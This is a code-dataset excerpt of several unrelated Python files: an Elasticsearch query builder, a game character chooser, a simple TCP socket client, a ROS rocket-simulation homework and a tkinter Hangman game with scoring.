add_geoqueries(self, radius=None, lat=None, lon=None, field=None, operation='filter'):\n radius = str(radius) + \"mi\"\n _ = {\n \"geo_distance\" : {\n \"distance\": radius,\n field : {\n \"lat\": lat,\n \"lon\": lon\n }\n }}\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def wildcard(self,field=None, value=None, boost=None, operation=None):\n _ = {\n \"wildcard\":{\n field:{\n \"value\":value\n\n }\n }\n }\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n else:\n _[\"wildcard\"][field][\"boost\"] = boost\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def exists(self,field=None, operation=\"must\"):\n\n _ = {\n \"exists\": {\n \"field\": field\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def query_string(self, default_field=None, query=None, operation=\"should\"):\n _ = {\n \"query_string\":{\n \"default_field\": default_field,\n \"query\":\"{}\".format(query)\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def add_geo_aggreation(self, field=None,lat=None, lon=None, aggregate_name='distance'):\n self.baseQuery.get(\"aggs\")[aggregate_name] = {\n \"geo_distance\" : {\n \"field\" : field,\n \"origin\" : \"{},{}\".format(lat, lon),\n \"unit\" : \"mi\",\n \"ranges\" : [\n { \"to\" : 0 },\n { \"from\" : 0, \"to\" : 25 },\n { \"from\" : 25, \"to\" : 50 },\n { \"from\" : 50, \"to\" : 75 },\n { \"from\" : 75, \"to\" : 100 },\n { \"from\" : 100 }\n ]\n }}\n return self.baseQuery\n\n def match_phrase_prefix(self, field=None, value=None, boost=None, operation='should',analyzer=None):\n _ = {\n \"match_phrase_prefix\": {\n field: {\n \"query\": value\n }\n }\n }\n\n if boost is not None:\n _[\"match_phrase_prefix\"][field][\"boost\"] = boost\n if analyzer is not None:\n _[\"match_phrase_prefix\"][field][\"analyzer\"] = analyzer\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def autocomplete_1(self, field=None,size=25, value=None, sort='des', operation='must'):\n query = self.match_phrase_prefix(field=field,value=value, operation=operation)\n query =self.add_aggreation(field=field, size=size, sort=sort,aggregate_name='auto_complete' )\n query = self.complete_aggreation()\n return query\n\n#\n# def main():\n# helper = ElasticSearchQuery(size=100, BucketName=\"MyBuckets\")\n#\n# # match phrase\n# query=helper.match_phrase(field=\"myfeild\", value=\"myvalue\", operation='must')\n#\n# # terms\n# query=helper.terms(field=\"myfeild\", value=\"myvalue\", operation='must')\n#\n# # Feild Exists\n# query = helper.exists(field='comp feild', operation=\"must\")\n#\n# #Match\n# query=helper.match(field=\"MMMMM\", value=\"myvalue\", operation='must')\n#\n# # Geo Queires\n# query = helper.add_geoqueries(radius=\"100\", lat=\"22\", lon=\"33\")\n#\n# # Aggreation\n# helper.add_aggreation(aggregate_name=\"FirstName\", field=\"field1\",type='terms',sort='desc', size=3)\n# helper.add_aggreation(aggregate_name=\"SecondName\", field=\"field2\",type='terms',sort='desc', size=3)\n# helper.add_aggreation(aggregate_name=\"ThirdName\", field=\"field3\",type='terms',sort='desc', size=3)\n# query = helper.complete_aggreation()\n# query = helper.query_string(default_field=\"DEFAULT\",query=\"X OR Y\",operation='must')\n#\n# query = helper.add_geo_aggreation(field=\"AAAA\", lat=\"22\", lon=\"43\",aggregate_name=\"my_distance\")\n#\n# print(json.dumps(query, indent=3))\n#\n#\n# def autocomplete():\n# helper = ElasticSearchQuery(size=0, BucketName=\"MyBuckets\")\n# query = helper.autocomplete_1(field=\"title\",value=\"n\", size=25,sort='desc')\n# print(json.dumps(query, indent=3))\n\n\n","sub_path":"backend/app/API/Compute/queryGenerator.py","file_name":"queryGenerator.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265749725","text":"import os\n\n\ndef choose_avatar():\n while True:\n try:\n character = int(input(\"1. ☆\\n2. ∆\\n3. ✧\\nChoose your character: \"))\n if character == 1:\n user = '☆'\n elif character == 2:\n user = '∆'\n elif character == 3:\n user = '✧'\n else:\n raise ValueError\n except ValueError:\n print(\"Choose a character using nubers 1-3: \")\n else:\n os.system('clear')\n return user\n\n\ndef choose_nickname():\n user_name = ''\n while True:\n try:\n user_name = input(\"Enter your nickname: \")\n if len(user_name) < 8 and len(user_name) > 0:\n os.system('clear')\n return user_name\n else:\n raise ValueError\n except ValueError:\n print(\"Your name is too long or too short\")\n","sub_path":"hero_creation.py","file_name":"hero_creation.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540296849","text":"import socket\nimport sys\nimport time\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 10000)\n#server_address = ('103.53.231.126', 777)\nprint('connecting to {0} port {0}'.format(server_address))\nsock.connect(server_address)\nsock.sendall(\"webApp?connected\".encode())\nsock.recv(1024)\n\nisSendingRequest = False\n\ndef sendRequest(inputRequest):\n global isSendingRequest\n try:\n print(\"Request: \"+ inputRequest)\n nodesQuantity = 0\n if (len(inputRequest.split('?')) == 3):\n nodesQuantity = int(inputRequest.split('?',1)[0])\n inputRequest = inputRequest.split('?',1)[1]\n countWaiting = 1\n while(isSendingRequest):\n print(\"waiting......\")\n time.sleep(1) \n countWaiting += 1\n if (countWaiting > 5):\n isSendingRequest = False \n return\n isSendingRequest = True \n sock.sendall(inputRequest.encode())\n response = (sock.recv(1024)).decode()\n if (nodesQuantity != 0):\n if (response.split('|')[8] == '4'):\n for i in range(0, nodesQuantity - 1):\n response += '?' + (sock.recv(1024)).decode()\n print(\"Server response: \" + response)\n isSendingRequest = False\n return response \n except:\n print('closing socket')\n sock.close()","sub_path":"socket_service/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334099385","text":"#!/usr/bin/env python\n#\n# Originally written for UNL CSCE 439/839 robotics class\n# by Carrick Detweiler\n#\n# HW2 \n\nimport roslib\nimport rospy\nfrom std_msgs.msg import Header\nfrom std_msgs.msg import Float64\nfrom random import gauss\n\nclass RocketShip(object):\n\n def updateRocket(self):\n # Increase acceleration control input, but only to a point\n if(self.control_accel.data < 1):\n self.control_accel.data += self.control_accel_delta\n\n # Update the true velocity based on controlled accel plus noise\n self.true_accel = self.control_accel.data + gauss(0,0.01)\n self.true_vel.data += self.true_accel*0.1 #10Hz rate\n # Update the true altitude\n self.true_altitude.data += self.true_vel.data*0.1\n\n # Now update the sensed accel, which will have more noise\n self.sensed_accel = self.true_accel + gauss(0,0.01)\n # Sensed velocity with more noise\n self.sensed_vel = self.true_vel.data + gauss(0,1)\n\n\n def __init__(self):\n rospy.init_node('rocketShip')\n\n # Create Publishers\n self.pub_true_altitude = rospy.Publisher('groundtruth/altitude', Float64, queue_size=1)\n self.pub_true_vel = rospy.Publisher('groundtruth/velocity', Float64, queue_size=1)\n self.pub_true_accel = rospy.Publisher('groundtruth/acceleration', Float64, queue_size=1)\n self.pub_sensed_accel = rospy.Publisher('sensors/acceleration', Float64, queue_size=1)\n self.pub_sensed_vel = rospy.Publisher('sensors/velocity', Float64, queue_size=1)\n self.pub_control_accel = rospy.Publisher('control/acceleration', Float64, queue_size=1)\n \n # Init variables\n self.true_altitude = Float64()\n self.true_vel = Float64()\n self.true_accel = Float64()\n self.sensed_accel = Float64()\n self.sensed_vel = Float64()\n self.control_accel = Float64()\n\n # Init values\n self.control_accel_delta = 0.005\n self.true_altitude.data = 0\n self.true_vel.data = 0\n self.control_accel.data = 0\n \n def flyMyRocket(self):\n while not rospy.is_shutdown():\n self.updateRocket()\n\n # Now publish everything\n self.pub_true_altitude.publish(self.true_altitude)\n self.pub_true_vel.publish(self.true_vel)\n self.pub_true_accel.publish(self.true_accel)\n self.pub_sensed_accel.publish(self.sensed_accel)\n self.pub_sensed_vel.publish(self.sensed_vel)\n self.pub_control_accel.publish(self.control_accel)\n\n rospy.sleep(0.1)\n\n\nif __name__ == '__main__':\n a = RocketShip()\n a.flyMyRocket()\n","sub_path":"ROS Workspaces/hw2stats/scripts/rocketShip.py","file_name":"rocketShip.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650466758","text":"#!/usr/bin/env python3\nimport setup as st\nimport record as rc\n\nfrom time import strftime, sleep\nfrom tkinter import (Tk, Label, Button, Frame, StringVar, IntVar,\n DISABLED, NORMAL, SUNKEN, SOLID,\n RIGHT, LEFT, TOP, BOTTOM, BOTH, CENTER)\n\n\nclass Hangman:\n \"\"\"Hangman class,\n made in tkinter GUInterface\"\"\"\n def __init__(self, master=None):\n \"\"\"Constructor\"\"\"\n\n # Screens init\n self.master = master\n self.screen()\n self.build_frame()\n self.build_grid()\n\n # All displayed labels\n self.banner_text = StringVar()\n self.banner_text.set('')\n self.banner_text.trace('w', self.build_title_label)\n\n self.counter = StringVar()\n self.counter.trace('w', self.build_countdown)\n\n self.clock_text = StringVar()\n self.clock_text.set('Clock')\n self.clock_text.trace('w', self.build_clock_label)\n\n self.word_text = StringVar()\n self.word_text.set('Choose your category')\n self.word_text.trace('w', self.build_word_label)\n\n self.secret_word = StringVar()\n self.prompt = StringVar()\n self.prompt.set('random')\n\n self.timer_text = StringVar()\n self.timer_text.set(strftime(\"%H:%M\"))\n self.timer_text.trace('w', self.build_timer)\n\n self.time_left = IntVar()\n self.time_left.set(st.DEFAULT_GAP)\n self.time_left.trace('w', self.alert)\n\n self.score_text = IntVar()\n self.score_text.set('0\\n0')\n self.score_text.trace('w', self.build_score_label)\n\n # Predefined variables\n self.sorted = ''\n self.char = ''\n self.level_status = 1\n self.total = 0\n self.abc = []\n self.category = []\n self.level = []\n self.misses = []\n self.guesses = []\n self.s_w_list = []\n self.first_last = []\n self.a = {}\n self.running = False\n self.rem = self.master.winfo_screenwidth()\n self.w = self.master.winfo_screenwidth() / 5\n self.h = self.master.winfo_screenheight() * 2 / 7\n\n # Methods call in __init__()\n self.build_title_label()\n self.build_word_label()\n self.build_countdown()\n self.build_welcome_label()\n self.build_score_label()\n self.build_timer()\n self.build_clock_label()\n\n self.buttons()\n self.category_buttons()\n self.abc_buttons()\n\n # Update time\n self.update()\n\n def screen(self):\n \"\"\"Main window\n Minimal size 1024 / 600\n The window goes full screen if the width it's lower than 1440\"\"\"\n self.master.minsize(1024, 600)\n if self.master.winfo_screenwidth() <= 1440:\n # and self.master.winfo_screenheight() <= 720:\n self.master.overrideredirect(True)\n self.master.geometry('{0}x{1}+0+0'.format(\n self.master.winfo_screenwidth(),\n self.master.winfo_screenheight()))\n # elif 1024 < self.master.winfo_screenwidth() < 1920 \\\n # and 720 < self.master.winfo_screenheight() < 1080:\n # a = int(float(70) * float(self.master.winfo_screenwidth()) / 100)\n # b = int(float(70) * float(self.master.winfo_screenheight()) / 100)\n # self.master.overrideredirect(True)\n # self.master.geometry('{}x{}+{}+{}'.format(\n # a, b, (self.master.winfo_screenwidth() // 2 - a // 2),\n # (self.master.winfo_screenheight() // 2 - b // 2)))\n else:\n self.master.overrideredirect(True)\n x = int(float(65) * float(self.master.winfo_screenwidth()) / 100)\n y = int(float(75) * float(self.master.winfo_screenheight()) / 100)\n self.master.maxsize(x, y)\n self.master.geometry('{}x{}+{}+{}'.format(\n x, y, (self.master.winfo_screenwidth() // 2 - x // 2),\n (self.master.winfo_screenheight() // 2 - y // 2)))\n self.master.update_idletasks()\n\n def mini_screen(self):\n \"\"\"Secondary window for result information\"\"\"\n # noinspection PyAttributeOutsideInit\n self.master_2 = Tk()\n # noinspection PyAttributeOutsideInit\n frame = Frame(self.master_2, bg=st.color['fg'],\n highlightbackground=st.color['fg_enter'],\n highlightcolor=st.color['fg_enter'],\n highlightthickness=3)\n if self.rem < 1440:\n x, y = 400, 500\n else:\n x, y = 700, 700\n self.master_2.geometry(\n '{}x{}+{}+{}'.\n format(x, y,\n int(self.master.winfo_screenwidth() // 2 - x / 2),\n int(self.master.winfo_screenheight() // 2 - y / 2)\n ))\n self.master_2.overrideredirect(True)\n self.master_2.update_idletasks()\n frame.pack(fill=BOTH, expand=True)\n niv = None\n if self.level_status == 1:\n niv = st.L_EN[2]\n if self.level_status == 2:\n niv = st.L_EN[1]\n if self.level_status == 3:\n niv = st.L_EN[0]\n text = st.P_EN['won'].format(\n niv.capitalize(), self.secret_word.get(), self.total, ''\n )\n fg = 'green'\n bg = st.color['fg']\n if len(self.misses) == 7 or not self.time_left.get():\n text = st.P_EN['lose']\n fg = 'red'\n # noinspection PyAttributeOutsideInit\n label = Label(\n frame, text=text,\n bg=bg, fg=fg, justify=LEFT,\n font=st.font(self.rem, 5)\n )\n ok = Button(\n frame, bg=st.color['fg'],\n bd=0, fg=st.color['fg_enter'], font=st.font(self.rem, 3),\n text='Ok', command=lambda: self.master_2.destroy(),\n activeforeground='black', activebackground=st.color['fg'],\n width=2\n )\n label.pack(fill=BOTH, expand=True)\n ok.place(relx=0.5, rely=0.96, anchor='s')\n\n def score_screen(self):\n \"\"\"Score screen\"\"\"\n # noinspection PyAttributeOutsideInit\n self.master_3 = Tk()\n # noinspection PyAttributeOutsideInit\n self.frame = Frame(self.master_3, bg=st.color['fg'],\n highlightbackground=st.color['fg_enter'],\n highlightcolor=st.color['fg_enter'],\n highlightthickness=3)\n if self.rem < 1440:\n x, y = 450, 500\n else:\n x, y = 600, 700\n self.master_3.geometry(\n '{}x{}+{}+{}'.\n format(x, y,\n int(self.master.winfo_screenwidth() // 2 - x / 2),\n int(self.master.winfo_screenheight() // 2 - y / 2)))\n self.master_3.overrideredirect(True)\n self.master_3.update_idletasks()\n self.frame.pack(fill=BOTH, expand=True)\n text = 'Level \\t Points\\t\\tTime\\n' + 37 * '_' + '\\n'\n for item in rc.search():\n text += '{}\\t {} {}\\n'.format(\n item.level, item.points,\n item.timestamp.strftime(' %B %d, %Y %I:%M %p')\n )\n label = Label(\n self.frame, text=text,\n bg=st.color['bg'], fg=st.color['fg'], justify=LEFT,\n font=st.font(self.rem, 0)\n )\n ok = Button(\n self.frame, bg=st.color['bg'],\n bd=0, fg=st.color['fg_enter'], font=st.font(self.rem, 3),\n text='Ok', command=lambda: self.master_3.destroy(),\n activeforeground='black', activebackground=st.color['fg'],\n width=2\n )\n label.pack(fill=BOTH, expand=True)\n ok.place(relx=0.5, rely=0.96, anchor='s')\n\n def create_frame(self, frame, code):\n \"\"\"Creates frames for the main window\"\"\"\n wa, wb, ha, hb = None, None, None, None\n if code is 'm':\n wa, wb, ha, hb = 1, 1, 1, 1\n elif code is 'r2':\n wa, wb, ha, hb = 1, 1, 3, 5\n elif code in ['r0', 'r1', 'r3']:\n wa, wb, ha, hb = 1, 1, 1, 5\n return Frame(frame, bg=st.color['bg'],\n width=self.master.winfo_width()*wa//wb,\n height=self.master.winfo_height()*ha//hb\n )\n\n def create_button(self, frame, text):\n \"\"\"General buttons creator\"\"\"\n font = None\n command = self.set_command(text)\n state = None\n bg, fg, abg, afg, dfg = st.set_buttons_color(text)\n button = Button(\n frame, text=text.capitalize(), bg=bg, fg=fg, font=font, bd=0,\n command=command, justify='center', overrelief=SUNKEN,\n anchor=CENTER, state=state, disabledforeground=dfg,\n activeforeground=afg, activebackground=abg, image=None\n )\n return button\n\n def build_frame(self):\n \"\"\"All the frames for the main window\"\"\"\n # noinspection PyAttributeOutsideInit\n self.welcome = self.create_frame(self.master, 'm')\n self.welcome.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['fg'],\n highlightthickness=2)\n self.welcome.pack(fill=BOTH, expand=True)\n\n # noinspection PyAttributeOutsideInit\n self.mainframe = self.create_frame(self.master, 'm')\n self.mainframe.config(highlightbackground='black',\n highlightcolor='black',\n highlightthickness=2)\n self.mainframe.pack(fill=BOTH, expand=True)\n self.mainframe.pack_forget()\n # Row 0\n # noinspection PyAttributeOutsideInit\n self.row_0_grid = self.create_frame(self.mainframe, 'r0')\n self.row_0_grid.grid(row=0, column=0, sticky='news', pady=10)\n # Row 0 Column 1\n # noinspection PyAttributeOutsideInit\n self.row_0_column_1 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_1.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['bg_start'],\n highlightthickness=2)\n self.row_0_column_1.grid(row=0, column=1, rowspan=2,\n sticky='news', pady=7)\n # Row 0 Column 2\n # noinspection PyAttributeOutsideInit\n self.row_0_column_2 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_2.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['bg_start'],\n highlightthickness=2)\n self.row_0_column_2.grid(row=0, column=2, rowspan=2,\n sticky='news', padx=20, pady=6)\n # Row 0 Column 3\n # noinspection PyAttributeOutsideInit\n self.row_0_column_3 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_3.grid(row=0, column=3, rowspan=2, columnspan=2,\n sticky='news', padx=3, pady=4)\n # Row 1\n # noinspection PyAttributeOutsideInit\n self.row_1_grid = self.create_frame(self.mainframe, 'r1')\n self.row_1_grid.grid(row=1, column=0, sticky='news', padx=13)\n # Row 2\n # noinspection PyAttributeOutsideInit\n self.row_2_grid = self.create_frame(self.mainframe, 'r2')\n self.row_2_grid.grid(row=2, column=0, sticky='news')\n # Row 3\n # noinspection PyAttributeOutsideInit\n self.row_3_grid = self.create_frame(self.mainframe, 'r3')\n self.row_3_grid.grid(row=3, column=0, sticky='news', padx=5, pady=5)\n\n def build_grid(self):\n \"\"\"Grid layout for all the frames\"\"\"\n u, u2 = None, None\n # Main Frame\n self.mainframe.columnconfigure(0, weight=1, uniform=u)\n for m in range(0, 4):\n self.mainframe.rowconfigure(m, weight=1, uniform=u2)\n # Row 0\n for y in range(15):\n self.row_0_grid.columnconfigure(y, weight=1, uniform=u)\n self.row_0_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_0_grid.rowconfigure(1, weight=1, uniform=u2)\n # Row 0 Column 1\n self.row_0_column_1.columnconfigure(0, weight=1, uniform=u)\n for c in range(6):\n self.row_0_column_1.rowconfigure(c, weight=1, uniform=u2)\n # Row 0 Column 2\n self.row_0_column_2.columnconfigure(0, weight=1, uniform=u)\n for c2 in range(3):\n self.row_0_column_2.rowconfigure(c2, weight=1, uniform=u2)\n # Row 0 Column 3\n self.row_0_column_3.columnconfigure(0, weight=1, uniform=u)\n for c3 in range(3):\n self.row_0_column_3.rowconfigure(c3, weight=1, uniform=u2)\n # Row 1\n for x in range(13):\n self.row_1_grid.columnconfigure(x, weight=1, uniform=u)\n self.row_1_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_1_grid.rowconfigure(1, weight=1, uniform=u2)\n # Row 2\n self.row_2_grid.columnconfigure(0, weight=1, uniform=u)\n self.row_2_grid.columnconfigure(1, weight=1, uniform=u)\n self.row_2_grid.rowconfigure(0, weight=1, uniform=u2)\n # Row 3\n for n in range(0, 4):\n self.row_3_grid.columnconfigure(n, weight=1, uniform=u)\n self.row_3_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_3_grid.rowconfigure(1, weight=1, uniform=u2)\n\n # noinspection PyUnusedLocal\n def build_score_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('points', 1)\n points = Label(\n self.row_0_column_1, text='Points:',\n bg=bg, fg=fg,\n font=st.font(self.rem, -4, style='normal'),\n bd=0,\n width=2\n )\n points.grid(row=0, column=0, sticky='news', padx=0, pady=0)\n b, f = st.set_buttons_color('score', 1)\n score = Label(\n self.row_0_column_1, textvariable=self.score_text,\n bg=b, fg=f,\n font=st.font(self.rem, 0),\n justify=CENTER,\n bd=0,\n width=2\n )\n score.grid(row=1, column=0, sticky='news', padx=0, pady=0)\n\n # noinspection PyUnusedLocal\n def build_welcome_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('title', 1)\n title = Label(\n self.welcome, text='Guess Letters',\n bg=bg, fg=fg,\n font=st.font(self.rem, 24),\n justify=CENTER\n )\n title.pack(side=TOP, padx=20, pady=50)\n\n # noinspection PyUnusedLocal\n def build_title_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('title', 1)\n title = Label(\n self.row_0_grid, text=self.banner_text.get(),\n bg=bg, fg=fg,\n font=st.font(self.rem, 10),\n width=6\n )\n title.grid(\n row=0, column=5, rowspan=2, columnspan=10,\n sticky='ew', padx=5, pady=2\n )\n\n # noinspection PyUnusedLocal\n def build_countdown(self, *args):\n \"\"\"Countdown label\"\"\"\n em = self.master.winfo_width() // 50\n # noinspection PyAttributeOutsideInit\n self.count = Label(\n self.row_2_grid, textvariable=self.counter,\n bg=st.color['bg'], fg=st.color['7'],\n font=('Times new Roman', int(4.5*em), 'bold'),\n )\n self.count.grid(\n row=0, column=0,\n sticky='nws', padx=2*em, pady=5\n )\n\n # noinspection PyUnusedLocal\n def build_clock_label(self, *args):\n \"\"\"Main clock label\"\"\"\n bg, fg = st.set_buttons_color('points', 1)\n # noinspection PyAttributeOutsideInit\n self.clock = Label(\n self.row_0_column_2, textvariable=self.clock_text,\n bg=bg, fg=fg,\n font=st.font(self.rem, 0),\n bd=0,\n width=2\n )\n self.clock.grid(row=0, column=0, sticky='news', padx=0, pady=0)\n\n # noinspection PyUnusedLocal\n def build_timer(self, *args):\n \"\"\"Timer label\"\"\"\n b, f = st.set_buttons_color('timer', 1)\n # noinspection PyAttributeOutsideInit\n self.timer = Label(\n self.row_0_column_2,\n text=self.timer_text.get(),\n bg=b, fg=f,\n font=st.font(self.rem, 14)\n )\n self.timer.grid(row=1, column=0, rowspan=2, sticky='nsew')\n\n # noinspection PyUnusedLocal\n def build_word_label(self, *args):\n \"\"\"Secret word label\"\"\"\n bg, fg = st.set_buttons_color('word', 1)\n # noinspection PyAttributeOutsideInit\n self.secret_word_label = Label(\n self.row_2_grid, textvariable=self.word_text,\n bg=bg, fg=fg, justify=RIGHT,\n font=st.font(self.rem, 16), anchor='e'\n )\n self.secret_word_label.grid(row=0, column=1,\n sticky='nse',\n padx=20, pady=5)\n\n # noinspection PyUnusedLocal\n def alert(self, *args):\n \"\"\"Timer alert for the hard level\"\"\"\n if not self.time_left.get():\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def draw_word(self):\n \"\"\"Drawing loop for the secret word label\"\"\"\n output = []\n index = 1\n\n # Draws the displayed word after each letter choice\n for x in self.secret_word.get():\n if self.level_status == 1:\n if x in self.first_last \\\n or x in self.guesses \\\n or x in [' ', '-']:\n output.append(x)\n elif x == self.char:\n output.append(self.char)\n else:\n output.append('_')\n index += 1\n elif self.level_status >= 2:\n if x in self.guesses or x in [' ', '-']:\n output.append(x)\n elif x == self.char:\n output.append(self.char)\n else:\n output.append('_')\n\n # Finally sets the label for display\n self.word_text.set(' '.join(output))\n\n def scoring(self):\n \"\"\"Scoring method for each level\"\"\"\n new = self.char\n total = 'Total'\n xp = 7 - len(self.misses)\n n = 0\n t = 0\n\n # Scoring points are defined by the input letter\n # if vowels score are lower in each difficulty level\n # if console, score are higher in each difficulty level\n if self.char in self.secret_word.get() and self.char in 'AEIOU':\n if self.level_status == 1:\n n = 4 * xp\n if self.level_status == 2:\n n = 5 * xp\n if self.level_status == 3:\n n = 7 * xp\n elif self.char in self.secret_word.get() and self.char not in 'AEIOU':\n if self.level_status == 1:\n n = 5 * xp\n if self.level_status == 2:\n n = 6 * xp\n if self.level_status == 3:\n n = 8 * xp\n self.total += n\n\n # Finally sets up the scoring window\n self.score_text.set(\n f'{new}' + (len(total) + 4 + len(str(t)) - 1) * ' ' + f'{n}\\n'\n f'{total}' + 6 * ' ' + f'{self.total}'\n )\n\n def game_status(self):\n \"\"\"Checks if it's a win or a loss\n Also changes the countdown label foreground color\n depending to the misses\"\"\"\n if len(self.misses) == 7:\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.timer_text.set(strftime(\"%H:%M\"))\n\n if sorted(self.guesses) == sorted(self.sorted):\n # Add a score entry to database if entries are less than 13\n if len(rc.search()) < 13:\n rc.add_entry(self.level_status, self.total)\n\n # Checks if last score in database is less than new score\n # if is than delete the last entry and the new higher score\n elif len(rc.search()) == 13 \\\n and rc.search()[12].points < self.total:\n rc.delete()\n rc.add_entry(self.level_status, self.total)\n\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.s_w_list.append(self.secret_word.get())\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def abc_buttons(self):\n \"\"\"Creates the alphabet buttons\"\"\"\n # noinspection PyAttributeOutsideInit\n r, c = 0, 0\n for item in st.ALPHABET:\n b = Button(\n self.row_1_grid, text='%s' % item,\n bg=st.color['bg'], fg=st.color['fg_abc'],\n font=st.font(self.rem, 1),\n command=lambda i=item: self.set_abc(i),\n justify='center', overrelief=SUNKEN,\n anchor=CENTER, bd=0, state=DISABLED,\n disabledforeground=st.color['dfg_abc'],\n activeforeground=st.color['afg_abc'],\n activebackground=st.color['abg_abc'],\n )\n if c == 13:\n r += 1\n c = 0\n b.grid(row=r, column=c, sticky='news', padx=7, pady=6)\n self.abc.append(b)\n c += 1\n\n def category_buttons(self):\n \"\"\"Word category buttons\"\"\"\n r, c, bg, s = 0, 0, st.color['bg_cat_a'], NORMAL\n for item in st.EN:\n if item == 'random':\n bg = st.color['fg']\n s = DISABLED\n b = Button(\n self.row_3_grid, text='%s' % item.capitalize(),\n bg=bg, fg=st.color['fg_cat'],\n font=st.font(self.rem, 8),\n command=lambda i=item: self.set_category(i),\n overrelief=SUNKEN,\n anchor=CENTER, bd=0, state=s,\n disabledforeground=st.color['bg'],\n activeforeground=st.color['fg_cat'],\n activebackground=st.color['bg_cat_a'],\n width=1\n )\n if c == 4:\n r += 1\n c = 0\n b.grid(row=r, column=c, sticky='news', padx=15, pady=10)\n self.category.append(b)\n c += 1\n\n def buttons(self):\n \"\"\"Info, check buttons\"\"\"\n close = st.image('quit')\n info = st.image('info')\n rule = st.image('rule')\n # noinspection PyAttributeOutsideInit\n self.start = self.create_button(self.row_0_grid, 'start')\n self.start.config(width=2, font=st.font(self.rem, -2))\n self.start.grid(row=0, column=0,\n sticky='news', padx=20, pady=7)\n # noinspection PyAttributeOutsideInit\n self.stop = self.create_button(self.row_0_grid, 'stop')\n self.stop.config(state=DISABLED, width=2, font=st.font(self.rem, -2))\n self.stop.grid(row=1, column=0,\n sticky='news', padx=20, pady=7)\n # noinspection PyAttributeOutsideInit\n self.quit = self.create_button(self.master, 'exit')\n self.quit.config(font=st.font(self.rem, 1),\n image=close)\n self.quit.image = close\n self.quit.place(relx=0.99, rely=0.01, anchor='ne')\n # noinspection PyAttributeOutsideInit\n self.score = self.create_button(self.row_0_column_1, 'high score')\n self.score.config(font=st.font(self.rem, -2, style='normal'),\n overrelief=None, relief=SOLID, bd=0,\n command=lambda: self.score_screen())\n self.score.grid(row=5, column=0, sticky='news')\n # noinspection PyAttributeOutsideInit\n self.info = self.create_button(self.welcome, 'info')\n self.info.config(font=st.font(self.rem, 0),\n command=lambda: st.set_rules('Game Info',\n st.prompt['Game Info']),\n image=info)\n self.info.image = info\n self.info.place(relx=0.01, rely=0.01, anchor='nw')\n # noinspection PyAttributeOutsideInit\n self.rule = self.create_button(self.welcome, 'rules')\n self.rule.config(font=st.font(self.rem, 0),\n command=lambda: st.set_rules('Game Rules',\n st.prompt['Game Rules']),\n image=rule)\n self.rule.image = rule\n self.rule.place(relx=0.01, rely=0.1, anchor='nw')\n # noinspection PyAttributeOutsideInit\n self.go = self.create_button(self.welcome, 'ENTER')\n self.go.config(font=st.font(self.rem, 16, family='Verdana'),\n text='ENTER')\n self.go.pack(side=BOTTOM, expand=False,\n padx=5, pady=60)\n back = st.image('back')\n # noinspection PyAttributeOutsideInit\n self.back = self.create_button(self.row_0_grid, 'Back')\n self.back.config(font=st.font(self.rem, 1),\n image=back)\n self.back.image = back\n self.back.place(relx=0.99, rely=0.42, x=0, y=0, anchor='se')\n r, s, bg = 0, NORMAL, st.color['bg_level']\n for item in st.L_EN:\n b = self.create_button(self.row_0_column_3, item)\n if item == 'easy':\n s = DISABLED\n bg = st.color['fg']\n b.config(state=s, font=st.font(self.rem, -4, style='bold'),\n command=lambda i=item: self.set_level(i), bg=bg)\n b.grid(row=r, column=0, sticky='news', pady=3)\n self.level.append(b)\n r += 1\n\n def destroy_all(self):\n \"\"\"Close all windows\"\"\"\n st.set_rules('Bye', st.prompt['Bye'])\n sleep(0.6)\n # noinspection PyBroadException\n try:\n self.master.destroy()\n # self.master_2.destroy()\n except NotImplementedError:\n pass\n\n def set_abc(self, item):\n \"\"\"Sets the alphabet buttons to the desired state\n depending to guesses and misses.\n calls the draw_word and game_status methods\n \"\"\"\n self.char = item\n self.scoring()\n bg, dfg, s = st.color['bg'], st.color['dfg_abc_b'], DISABLED\n if item in self.secret_word.get():\n bg, dfg, s = st.color['bg'], st.color['dfg_abc_g'], \\\n DISABLED\n self.guesses.append(item)\n 